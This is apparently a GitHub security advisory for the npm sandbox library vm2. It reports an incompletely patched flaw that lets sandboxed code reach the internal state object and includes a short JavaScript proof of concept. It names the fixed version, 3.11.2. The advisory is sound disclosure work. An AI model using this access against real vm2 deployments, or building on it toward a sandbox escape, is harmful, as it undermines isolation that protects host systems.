MEDIUM 5.3

GHSA-2cm2-m3w5-gp2f

vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`

Details

### Summary

https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.

### Details

It is still possible to get access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`.

### PoC

```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
  globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
`));
```

Affected packages

npm / vm2
Introduced in: 0
Fixed in: 3.11.2
Fix: `npm install vm2@3.11.2`